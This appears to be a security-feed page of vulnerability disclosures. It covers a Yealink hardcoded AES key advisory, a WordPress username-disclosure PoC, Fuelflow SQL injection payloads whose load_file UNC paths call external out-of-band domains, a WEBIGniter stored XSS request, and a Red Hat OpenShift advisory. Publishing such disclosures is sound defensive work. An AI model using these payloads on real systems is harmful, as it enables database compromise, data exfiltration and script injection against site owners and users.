    CloudAware Security AdvisoryCVE-2024-24681: Insecure AES key in Yealink Configuration Encrypt Tool========================================================================Summary========================================================================A single, vendorwide, hardcoded AES key in the configuration tool used toencrypt provisioning documents was leaked leading to a compromise ofconfidentiality of provisioning documents.========================================================================Product========================================================================* Yealink Configuration Encrypt Tool (AES version)* Yealink Configuration Encrypt Tool (RSA version <v1.2)========================================================================Detailed description========================================================================The Yealink Configuration Encrypt Tool facilites provisioning and configuration mangementof Yealink products, such as VoIP phones. The tool created AES encrypted provisioningdocuments, containing configuration directives such asusername=user1passwword=passw0rd!serverhost=sip.host.comcallerid=+19051231212The files created by this tool are then transferred to the Yealink equipment. The equipmentdecrypts the files and uses them to configure itself.This process needs to be secure. So these files are encrypted.The decryption is done by a static, hardcoded, key that is identical across all installs andcustomers. After decryption of this file by the hardcoded AES key confidential information,such as user passwords are visible in plain text.This implies that knowledge of this hardcoded key allows for the disclosure of sensitiveinformation from the configuration files, or that files with different information can beintroduced and are axiomatically trusted by the phone.As this key is static - this includes historic files from any customer that used this tool.The vendor has fixed this in version 1.2 of the Configuration Encrypt Tool.========================================================================Solution========================================================================1) Upgrade Yealink Configuration Encrypt Tool to version 1.22) Evaluate the impact of the disclosure of any configurations rolled out withprior versions of this tool (including, specifically, the leaking of passwords)========================================================================Mitigation========================================================================1) If an upgrade is not an option - as `anyone' can create valid configurationfiles; ensure that affected equipment is unable to reach provisioning servers.2) Evaluate the impact of the disclosure of any configurations rolled out priorto these mitigation steps========================================================================Weblinks========================================================================https://github.com/gitaware/CVE/tree/main/CVE-2024-24681========================================================================History========================================================================early 2020, release of Configuration Encrypt Tool v1 containing RSA encryption methodjuli 2022, Yealink informed “old” AES key still present and working in tool2023, new version of Configuration Encrypt Tool v1.2 without a hardcoded AESencryptionkey

Yealink Configuration Encrypt Tool Static AES Key

WordPress versions 6.4.3 and below appear to suffer from a REST API related username disclosure vulnerability.

    # Title: wordpress 6.4.3 - Username Disclosure# Author: h4shur# date:2024-02-21# Vendor Homepage: https://www.wordpress.org# Software Link: https://www.wordpress.org/download# Version:  6.4.3 and earlier# Tested on: Windows 10 & Google Chrome# Category : Web Application Bugs### Description :the REST API allows simulating different request types. As such, we canperform a POST request with the “users” string in the body of the request,and tell the REST API to act like it’s received a GET request.You can see the management username in the "slug" feature. And evensecurity plugins like "iThemes Security" do not block this path.### POC :https://target.com/wp-json/?rest_route=/wp/v2/users/# output :[{"id":1,"name":"admin","url":"https:\/\/target.com","description":"","link":"https:\/\/target.com\/?author=1","slug":"admin_1l","avatar_urls":{"24":"https:\/\/secure.gravatar.com\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=24&d=mm&r=g","48":"https:\/\/secure.gravatar.com\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=48&d=mm&r=g","96":"https:\/\/secure.gravatar.com\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=96&d=mm&r=g"},"meta":[],"_links":{"self":[{"href":"https:\/\/target.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"collection":[{"href":"https:\/\/target.com\/index.php?rest_route=\/wp\/v2\/users"}]}}]### Admin Panel :https://target.com/wp-adminhttps://target.com/login.php### contact :h4shursec@gmail.comtwitter.com/h4shurinstagram.com/h4shurt.me/h4shur

WordPress 6.4.3 Username Disclosure

Fuelflow version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: fuelflow-1.0-Copyright-©-2024-Project-Develop-by-Mayuri-K-Multiple-SQLi## Author: nu11secur1ty## Date: 02/21/24## Vendor: https://www.mayurik.com/## Software: https://www.mayurik.com/source-code/P3584/best-petrol-pump-management-software## Reference: https://portswigger.net/web-security/sql-injection## Description:The email parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.tupaputka.com\\xvb'))+'was submitted in the email parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can receive very sensitive informationabout this system by using these vulnerabilities!STATUS: HIGH-Vulnerability[+]Payload:```mysql---Parameter: email (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: email=-5782' OR 2852=2852 OR'nYvi'='GjbH&password=h3I!y3o!F9&submit=    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: email=mOsqQatz@burpcollaborator.net'+(selectload_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.oastify.com\\xvb'))+''AND (SELECT 9621 FROM(SELECT COUNT(*),CONCAT(0x7178706271,(SELECT(ELT(9621=9621,1))),0x7178787671,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) OR'BiVP'='cVHj&password=h3I!y3o!F9&submit=    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: email=mOsqQatz@burpcollaborator.net'+(selectload_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.oastify.com\\xvb'))+'';SELECTSLEEP(7)#&password=h3I!y3o!F9&submit=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: email=mOsqQatz@burpcollaborator.net'+(selectload_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.oastify.com\\xvb'))+''AND (SELECT 3257 FROM (SELECT(SLEEP(7)))QSTs) OR'Lshu'='MGpY&password=h3I!y3o!F9&submit=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2024/fuelflow-1.0-Copyright-%C2%A9-2024-Project-Develop-by-Mayuri-K-Multiple-SQLi)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/02/fuelflow-10-copyright-2024-project.html)## Time spent:00:35:00

Fuelflow 1.0 SQL Injection

WEBIGniter version 28.7.23 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WEBIGniter v28.7.23 Stored Cross Site Scripting (XSS)# Exploit Author: Sagar Banwa# Date: 19/10/2023# Vendor: https://webigniter.net/# Software: https://webigniter.net/demo# Reference: https://portswigger.net/web-security/cross-site-scripting# Tested on: Windows 10/Kali Linux# CVE : CVE-2023-46391Stored Cross-site scripting(XSS):Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.Steps-To-Reproduce:1. Login to the Account 2. Go to the Categories.3. Now add catagory > Name section use payload : "><script>alert(1)</script> and choose layoutfile as cat.phpRequest POST /cms/categories/add HTTP/2Host: demo.webigniter.netCookie: ci_session=iq8k2mjlp2dg4pqa42m3v3dn2d4lmtjb; hash=6ROmvkMoHKviB4zypWJXmjIv6vhTQlFw6bdHlRjXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 94Origin: https://demo.webigniter.netReferer: https://demo.webigniter.net/cms/categories/addUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersname=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&slug=scriptalert1script&layout_file=cat.php

WEBIGniter 28.7.23 Cross Site Scripting

Red Hat Security Advisory 2024-0832-03 - Red Hat OpenShift Container Platform release 4.12.50 is now available with updates to packages and images that fix several bugs. Issues addressed include denial of service and traversal vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0832.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Critical: OpenShift Container Platform 4.12.50 security and extras update  
Advisory ID:        RHSA-2024:0832-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0832  
Issue date:         2024-02-21  
Revision:           03  
CVE Names:          CVE-2023-49568  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.12.50 is now available with updates to packages and images that fix several bugs.

This release includes a security update for Red Hat OpenShift Container Platform 4.12.

Red Hat Product Security has rated this update as having a security impact of  Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.12.50. See the following advisory for the container images for this release:

https://access.redhat.com/errata/RHSA-2024:0833

Security Fix(es):

* go-git: Maliciously crafted Git server replies can lead to path traversal  
and RCE on go-git clients (CVE-2023-49569)  
* go-git: Maliciously crafted Git server replies can cause DoS on go-git  
clients (CVE-2023-49568)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.12 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

Solution:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

CVEs:

CVE-2023-49568

References:

https://access.redhat.com/security/updates/classification/#critical  
https://bugzilla.redhat.com/show_bug.cgi?id=2258143  
https://bugzilla.redhat.com/show_bug.cgi?id=2258165

Tag

#web